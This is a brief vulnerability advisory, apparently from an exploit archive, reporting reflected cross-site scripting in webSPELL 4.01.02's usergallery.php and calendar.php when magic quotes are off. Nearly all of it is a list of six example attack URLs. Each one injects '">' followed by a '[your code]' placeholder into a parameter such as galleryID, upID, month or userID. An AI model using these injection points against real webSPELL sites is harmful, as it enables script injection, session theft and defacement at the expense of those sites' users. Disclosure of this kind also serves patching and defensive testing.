webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
###################
Autor: Brainhead
Type: XSS
Version: 4.01.02
Files: usergallery.php, calendar.php
Magic Quotes :off
###################
Examples:
http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[your
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[your
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">[your
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[your
code]